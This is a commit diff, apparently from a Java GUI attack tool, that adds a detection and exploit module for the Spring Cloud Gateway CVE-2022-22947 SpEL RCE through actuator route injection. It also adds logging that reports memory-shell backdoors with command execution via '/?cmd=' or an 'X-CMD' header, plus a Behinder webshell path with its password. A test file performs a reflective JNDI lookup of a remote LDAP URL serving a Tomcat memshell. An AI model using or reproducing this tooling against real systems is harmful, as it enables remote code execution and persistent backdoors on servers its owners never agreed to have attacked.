if(!logbackRCEPOC.hasJolokiaLogbackRCE(url) || realmJNDIRCEPOC.hasJolokiaRealmJNDIRCE(url)){

H2DatabaseConsoleJNDIRCEPOC h2 = new H2DatabaseConsoleJNDIRCEPOC();
if (!h2.hasH2DatabaseConsoleJNDIRCE(url)){
SpringCloudGatewayRCEPOC gatewayRCEPOC = new SpringCloudGatewayRCEPOC();
if (!gatewayRCEPOC.hasSpringCloudGatewayRCEPOC(addr)){

}
}

}
63 changes: 63 additions & 0 deletions src/main/java/com/drops/poc/SpringCloudGatewayRCEPOC.java
Original file line number Diff line number Diff line change
@@ -0,0 +1,63 @@
package com.drops.poc;

import com.drops.entity.ControllersFactory;
import com.drops.ui.MainController;
import com.drops.utils.HTTPUtils;
import com.drops.utils.StringRandom;
import com.drops.utils.Utils;

import java.util.Locale;

/**
* @ClassName: SpringCloudGatwayRCEPOC
* @Description: TODO
* @Author: Summer
* @Date: 2022/4/17 16:55
* @Version: v1.0.0
* @Description:
CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE
**/
public class SpringCloudGatewayRCEPOC {

private final MainController mainController;

public SpringCloudGatewayRCEPOC( ) {
this.mainController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName());

}

public boolean hasSpringCloudGatewayRCEPOC(String target) {
String endpoint = "s" + StringRandom.getRandomString(5);
String body = String.format("{\n" +
" \"id\": \"%s\",\n" +
" \"filters\": [{\n" +
" \"name\": \"AddResponseHeader\",\n" +
" \"args\": {\"name\": \"Result\",\"value\": \"%s\"}\n" +
" }],\n" +
" \"uri\": \"%s\",\n" +
" \"order\": 0\n" +
"}", endpoint, endpoint, target);

String re1 = HTTPUtils.postRequestjson(target , "actuator/gateway/routes/" + endpoint, body).toString();
String re2 = HTTPUtils.postRequestV1(target , "actuator/gateway/refresh").toString();
String re3 = HTTPUtils.getRequest(target , "actuator/gateway/routes/" + endpoint).toString();
System.out.println("re1 = " + re1);
System.out.println("re2 = " + re2);
System.out.println("re3 = " + re3);
if (re3.toLowerCase().contains(endpoint.toLowerCase())) {
this.mainController.logTextArea.appendText(Utils.log("存在SpringCloudGatewayRCEPOC漏洞\n"));
return true;
}else {
this.mainController.logTextArea.appendText(Utils.log("不存在SpringCloudGatewayRCEPOC漏洞\n"));
}
HTTPUtils.deleteRequest(target , "actuator/gateway/routes/" + endpoint);
HTTPUtils.postRequestV1(target , "actuator/gateway/refresh");
return false;
}






}
18 changes: 13 additions & 5 deletions src/main/java/com/drops/ui/MainController.java
Original file line number Diff line number Diff line change
@@ -124,7 +124,7 @@ private void initConnect() {


private void initComBoBox() {
ObservableList<String> gadgets = FXCollections.observableArrayList(new String[]{ "SnakeYAMLRCE", "SpELRCE", "EurekaXstreamRCE", "JolokiaLogbackRCE", "JolokiaRealmRCE", "H2DatabaseConsoleJNDIRCE"});
ObservableList<String> gadgets = FXCollections.observableArrayList(new String[]{ "SnakeYAMLRCE", "SpELRCE", "EurekaXstreamRCE", "JolokiaLogbackRCE", "JolokiaRealmRCE", "H2DatabaseConsoleJNDIRCE", "SpringCloudGatewayRCE"});
this.gadgetOpt.setPromptText("SnakeYAMLRCE");
this.gadgetOpt.setValue("SnakeYAMLRCE");
this.gadgetOpt.setItems(gadgets);
@@ -303,11 +303,19 @@ public void crackSpcGadgetBtn(ActionEvent actionEvent) {
boolean flag = this.attackService.gadgetSend(this.targetAddress.getText(),
this.vps.getText(),this.gadgetOpt.getValue(),this.getPorts());
if(flag){
if (HTTPUtils.getRequest(String.valueOf(this.targetAddress.getText()),"ateam").isOk()){
this.logTextArea.appendText(Utils.log(" 冰蝎内存马注入成功 !"));
this.logTextArea.appendText(Utils.log( " /ateam 密码:ateamnb"));
System.out.println(this.gadgetOpt.getValue());
if (this.gadgetOpt.getValue().equalsIgnoreCase("SpringCloudGatewayRCE")){
this.logTextArea.appendText(Utils.log(" SpringCloudGateway 漏洞利用成功"));
this.logTextArea.appendText(Utils.log(" 请自行检查是NettyMemshell 还是 SpringRequestMappingMemshell!"));
this.logTextArea.appendText(Utils.log(" 如果是SpringRequestMappingMemshell,/?cmd={cmd} 执行命令"));
this.logTextArea.appendText(Utils.log(" 如果是NettyMemshell,header头 X-CMD: {cmd} 执行命令"));
}else {
this.logTextArea.appendText(Utils.log("漏洞利用失败!\t"));
if (HTTPUtils.getRequest(String.valueOf(this.targetAddress.getText()),"ateam").isOk()){
this.logTextArea.appendText(Utils.log(" 冰蝎内存马注入成功 !"));
this.logTextArea.appendText(Utils.log( " /ateam 密码:ateamnb"));
}else {
this.logTextArea.appendText(Utils.log("漏洞利用失败!\t"));
}
}
}else {
this.logTextArea.appendText(Utils.log("漏洞利用失败!\t"));
15 changes: 15 additions & 0 deletions src/main/java/com/drops/utils/HTTPUtils.java
Original file line number Diff line number Diff line change
@@ -33,6 +33,21 @@ public HTTPUtils(int Timeout){
HttpGlobalConfig.setTimeout(Timeout);
}

public static HttpResponse deleteRequest(String target, String s) {
String url = URLUtil.normalizeURL(target);
Proxy proxy = (Proxy) MainController.currentProxy.get("proxy");
HttpResponse result = null;
if (proxy == null){
result = HttpRequest.delete(url).execute();
}else {
result = HttpRequest.delete(url).setProxy(proxy).execute();
}

return result;
}



public void setTimeout(int Timeout){
HttpGlobalConfig.setTimeout(Timeout);
}
30 changes: 30 additions & 0 deletions src/main/java/com/drops/utils/StringRandom.java
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
package com.drops.utils;

/**
* @ClassName: StringRandom
* @Description: TODO
* @Author: Summer
* @Date: 2022/4/17 19:43
* @Version: v1.0.0
* @Description:
**/
public class StringRandom {

/**
* @Description: 获取随机字符串
* @Param: [length]
* @return: java.lang.String
*
*/
public static String getRandomString(int length) {
String base = "abcdefghijklmnopqrstuvwxyz0123456789";
int size = base.length();
StringBuilder sb = new StringBuilder();
for (int i = 0; i < length; i++) {
int number = (int) (Math.random() * size);
sb.append(base.charAt(number));
}
return sb.toString();
}

}
Binary file added src/test/java/0cat.class
Binary file not shown.
32 changes: 32 additions & 0 deletions src/test/java/Client.java
Original file line number Diff line number Diff line change
@@ -0,0 +1,32 @@
/**
* @ClassName: Client
* @Description: TODO
* @Author: Summer
* @Date: 2021/8/2 10:53
* @Version: v1.0.0
* @Description:
**/
import java.io.IOException;
import java.net.Socket;
import java.net.UnknownHostException;
import java.util.Hashtable;

import javax.naming.Context;
import javax.naming.NamingEnumeration;
import javax.naming.directory.Attribute;
import javax.naming.directory.Attributes;
import javax.naming.directory.DirContext;
import javax.naming.directory.InitialDirContext;
import javax.naming.directory.SearchControls;
import javax.naming.directory.SearchResult;

public class Client {
// public static void main(String[] args) {
// demo d = new demo();
// d.setDemo();
// if (d.isFlag()){
// System.out.println("sad");
// }
// }
}

170 changes: 170 additions & 0 deletions src/test/java/LdapClient.java
Original file line number Diff line number Diff line change
@@ -0,0 +1,170 @@
/**
* @ClassName: LdapClient
* @Description: TODO
* @Author: Summer
* @Date: 2021/8/2 11:00
* @Version: v1.0.0
* @Description:
**/
import java.util.Properties;
import javax.naming.NamingException;
import javax.naming.NamingEnumeration;
import javax.naming.directory.*;
import javax.naming.ldap.*;

/**
* Created by baikai on 8/17/16.
*/
public class LdapClient {

private String ldapUrl;
private String ldapUserDN;
private String ldapPwd;

public LdapClient(String ldapUrl, String ldapUserDN, String ldapPwd){
this.ldapUrl = ldapUrl;
this.ldapUserDN = ldapUserDN;
this.ldapPwd = ldapPwd;
}

/**
* Create LDAP user
* @param userName
* @param password
* @param uidNumber
* @param gidNumber
*/
public void createLDAPUser(String userName, String password, String uidNumber, String gidNumber){
LdapContext context = this.initLDAPContext();
Attributes matchAttrs = new BasicAttributes(true);
BasicAttribute objclassSet = new BasicAttribute("objectClass");
objclassSet.add("account");
objclassSet.add("posixAccount");
matchAttrs.put(objclassSet);
matchAttrs.put(new BasicAttribute("uid", userName));
matchAttrs.put(new BasicAttribute("cn", userName));
matchAttrs.put(new BasicAttribute("uidNumber", uidNumber));
matchAttrs.put(new BasicAttribute("gidNumber", gidNumber));
matchAttrs.put(new BasicAttribute("homeDirectory", "/home/" + userName));
matchAttrs.put(new BasicAttribute("userpassword", password));
matchAttrs.put(new BasicAttribute("description", "LDAP user."));

try {
context.bind("uid=" + userName + ",ou=People,dc=asiainfo,dc=com", null, matchAttrs);
} catch (NamingException e) {
e.printStackTrace();
}finally {
this.closeLdapContext(context);
}
}

/**
* Create LDAP user group
* @param groupName
* @param password
* @param gidNumber
*/
public void createLDAPUserGroup(String groupName, String password, String gidNumber){
LdapContext context = this.initLDAPContext();
Attributes matchAttrs = new BasicAttributes(true);
matchAttrs.put(new BasicAttribute("objectclass", "posixGroup"));
matchAttrs.put(new BasicAttribute("cn", groupName));
matchAttrs.put(new BasicAttribute("gidNumber", gidNumber));
matchAttrs.put(new BasicAttribute("userPassword", password));
try {
context.bind("cn=" + groupName + ",ou=People,dc=asiainfo,dc=com", null, matchAttrs);
} catch (NamingException e) {
e.printStackTrace();
}finally {
this.closeLdapContext(context);
}
}

/**
* Delete LDAP user
* @param userName
*/
public void deleteLDAPUser(String userName){
LdapContext context = this.initLDAPContext();
try {
context.unbind(userName);
} catch (NamingException e) {
e.printStackTrace();
}finally {
this.closeLdapContext(context);
}
}

/**
* Delete LDAP user group
* @param groupName
*/
public void deleteLDAPUserGroup(String groupName){
this.deleteLDAPUser(groupName);
}

/**
* Modify LDAP user attribute with new value
* @param userName
* @param attributeName
* @param attributeNewValue
*/
public void updateLDAPUserAttribute(String userName, String attributeName, String attributeNewValue){
LdapContext context = this.initLDAPContext();
ModificationItem[] mods = new ModificationItem[1];
mods[0] = new ModificationItem(context.REPLACE_ATTRIBUTE, new BasicAttribute(attributeName, attributeNewValue));
try{
context.modifyAttributes(userName, mods);
}catch (NamingException e) {
e.printStackTrace();
}finally {
this.closeLdapContext(context);
}
}

/**
* Search LDAP users by user dn and filter
* @param userName
* @param filter
* @return NamingEnumeration<SearchResult>
*/
public NamingEnumeration<SearchResult> searchLDAPUser(String userName, String filter){
NamingEnumeration<SearchResult> searchResults = null;
LdapContext context = this.initLDAPContext();
SearchControls ctrl = new SearchControls();
ctrl.setSearchScope(SearchControls.SUBTREE_SCOPE);
try {
searchResults = context.search(userName, filter, ctrl);
} catch (NamingException e) {
e.printStackTrace();
}finally {
this.closeLdapContext(context);
}
return searchResults;
}

private LdapContext initLDAPContext(){
LdapContext context = null;
Properties mEnv = new Properties();
mEnv.put(LdapContext.AUTHORITATIVE, "true");
mEnv.put(LdapContext.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
mEnv.put(LdapContext.PROVIDER_URL, this.ldapUrl);
mEnv.put(LdapContext.SECURITY_AUTHENTICATION, "simple");
mEnv.put(LdapContext.SECURITY_PRINCIPAL, this.ldapUserDN);
mEnv.put(LdapContext.SECURITY_CREDENTIALS, this.ldapPwd);
try {
context = new InitialLdapContext(mEnv,null);
} catch (NamingException e) {
e.printStackTrace();
}
return context;
}

private void closeLdapContext(LdapContext context){
try {
context.close();
} catch (NamingException e) {
e.printStackTrace();
}
}
}
37 changes: 37 additions & 0 deletions src/test/java/gateway.java
Original file line number Diff line number Diff line change
@@ -0,0 +1,37 @@
import com.drops.utils.StringRandom;

/**
* @ClassName: gateway
* @Description: TODO
* @Author: Summer
* @Date: 2022/4/17 19:46
* @Version: v1.0.0
* @Description:
**/
public class gateway {
public static void main(String[] args) {
String endpoint = "s" + StringRandom.getRandomString(5);
String body = String.format("{\n" +
" \"id\": \"%s\",\n" +
" \"filters\": [{\n" +
" \"name\": \"AddResponseHeader\",\n" +
" \"args\": {\"name\": \"Result\",\"value\": \"%s\"}\n" +
" }],\n" +
" \"uri\": \"http://example.com\",\n" +
" \"order\": 0\n" +
"}", endpoint, endpoint);

System.out.println(body);


String res = "Response Headers: \n" +
" null=[HTTP/1.1 200 OK]\n" +
" Content-Length=[7]\n" +
" Content-Type=[text/html;charset=UTF-8]\n" +
"Response Body: \n" +
" s0gjvh";
System.out.println(res.contains("s0gjvh"));

}

}
31 changes: 31 additions & 0 deletions src/test/java/spel.java
Original file line number Diff line number Diff line change
@@ -0,0 +1,31 @@
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.lang.reflect.InvocationTargetException;

/**
* @ClassName: spel
* @Description: TODO
* @Author: Summer
* @Date: 2021/8/23 11:39
* @Version: v1.0.0
* @Description:
**/
public class spel {
public static void main(String[] args) {
try {
// javax.naming.InitialContext context = new InitialContext();
// context.lookup("ldap://127.0.0.1:1389/basic/TomcatMemShell3");

java.lang.Class.forName("javax.naming.InitialContext").getMethod("lookup", String.class).invoke(Class.forName("javax.naming.InitialContext").newInstance(),"ldap://127.0.0.1:1389/basic/TomcatMemShell3");
// new javax.naming.InitialContext().lookup("");
} catch ( ClassNotFoundException | NoSuchMethodException e) {
e.printStackTrace();
} catch (InvocationTargetException e) {
e.printStackTrace();
} catch (IllegalAccessException e) {
e.printStackTrace();
} catch (InstantiationException e) {
e.printStackTrace();
}
}
}

0 comments on commit e9dcb1b

Please sign in to comment.